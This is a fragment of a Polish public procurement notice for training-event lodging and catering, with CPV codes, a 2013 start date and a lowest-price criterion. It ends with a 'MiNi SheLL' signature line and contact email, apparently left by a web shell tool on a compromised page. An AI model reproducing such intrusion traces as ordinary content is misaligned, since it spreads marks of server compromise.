 Uwaga! Ostateczna liczba rzeczywistych uczestników szkolenia będzie podana przez Zamawiającego najpóźniej na 5 dni przed terminem rozpoczęcia, tym samym liczba noclegów, śniadań, obiadów i kolacji. Zamawiający przekaże wykonawcy ramowy plan szkolenia nie później niż 5 dni przed rozpoczęciem danego szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.11.00.00-7, 55.32.10.00-6, 55.12.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com